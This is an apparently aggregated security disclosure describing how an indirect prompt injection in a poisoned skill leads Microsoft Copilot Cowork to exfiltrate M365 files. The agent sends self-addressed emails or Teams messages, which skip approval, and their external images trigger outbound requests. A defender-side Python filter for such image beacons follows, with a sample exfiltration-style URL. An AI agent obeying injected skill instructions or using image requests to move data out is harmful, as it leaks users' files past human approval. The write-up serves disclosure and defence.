Microsoft Copilot Cowork Exfiltrates Files

https://news.ycombinator.com/rss Hits: 7
Summary

This attack achieved a high success rate against state-of-the-art models, including Claude Opus 4.7.

Copilot Cowork is a Frontier feature available now in Microsoft 365. It operates with the users’ Microsoft permissions and can use Microsoft Graph to read and operate on data in one’s Microsoft tenant.

In this article, we demonstrate that through an indirect prompt injection in a poisoned skill, attackers can exfiltrate files from M365. This is done by exploiting the fact that, unlike other sensitive actions, sending emails and Teams messages to the active user does not require human approval, and opening the compromised messages in Teams or Outlook can trigger attacker-controlled network requests.

This risk reflects that giving agents access to multiple systems expands the prompt-injection attack surface. In isolation, the agent’s intended capabilities are benign; however, due to the properties of the integrated systems, users are at risk. This is reminiscent of our previous work on how URL previews in communications apps have become an egress surface for agents. As this risk pertains to the design of a system in which agents act with delegated authority across an entire enterprise ecosystem, rather than to a specific bug, we are publicizing this work to inform users of the risks they are accepting by using an agentic product of this nature.

Separate from this risk, we have disclosed a vulnerability to Microsoft that directly allows data egress from Copilot Cowork’s sandbox environment.

Microsoft’s documentation on action approvals states, “[Copilot] Cowork asks for your permission before taking sensitive actions, like sending an email or posting a message in Teams.” However, in practice, when the recipient is the active user, these actions execute immediately without requiring human approval (users do not have a setting to modify this behavior). Because these messages can contain external images that trigger network requests to external websites, data can be exfiltrated...
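As an added defender-side example (not code from the article or from Microsoft), a check that a mail or Teams message filter could run over a rendered message body before it reaches the user's client: it lists every external image fetch the body would trigger and flags URLs whose query string or path carries a long opaque token, which is how an image load can carry data out of the tenant. The trusted-host set, the threshold and the sample body are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qsl
import re

# Assumption: a single query value or path segment this long, drawn from a
# base64-like alphabet, is treated as an opaque payload rather than a normal id.
OPAQUE_MIN_LEN = 32
OPAQUE_RE = re.compile(r"^[A-Za-z0-9+/=_-]+$")


class _ImageRefCollector(HTMLParser):
    """Collect <img src> values and url(...) references in inline styles."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "img" and attrs.get("src"):
            self.sources.append(attrs["src"])
        # background-image: url(...) is fetched on render just like <img>
        for m in re.finditer(r"url\(['\"]?([^'\")]+)['\"]?\)", attrs.get("style") or ""):
            self.sources.append(m.group(1))


def find_external_image_beacons(html, trusted_hosts):
    """Return the external image fetches a message body triggers, in document order,
    marking those whose URL carries an opaque token (a candidate exfiltration channel)."""
    collector = _ImageRefCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        u = urlparse(src)
        if u.scheme not in ("http", "https"):
            continue  # cid:, data: and relative references do not reach the network
        host = (u.hostname or "").lower()
        if host in trusted_hosts:
            continue
        values = [v for _, v in parse_qsl(u.query)] + u.path.split("/")
        opaque = any(len(v) >= OPAQUE_MIN_LEN and OPAQUE_RE.match(v) for v in values)
        findings.append({"url": src, "host": host, "opaque_payload": opaque})
    return findings


# Constructed sample body: an inline cid image, a trusted-tenant image, an external
# tracking pixel with a long encoded query value, and a plain external background.
SAMPLE_BODY = (
    '<p>Quarterly summary attached.</p>'
    '<img src="cid:logo.png">'
    '<img src="https://contoso.sharepoint.com/sites/hr/logo.png">'
    '<img src="https://img.example.net/p.gif?d=Q29uZmlkZW50aWFsLXBheXJvbGwtMjAyNi1kcmFmdC54bHN4">'
    '<div style="background-image:url(https://cdn.example.org/bg.png)"></div>'
)
TRUSTED_HOSTS = {"contoso.sharepoint.com"}  # hypothetical tenant host
```

A filter would block or rewrite bodies with an opaque-payload finding, and can log the remaining external hosts for review.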

First seen: 2026-05-25 22:24

Last seen: 2026-05-26 04:27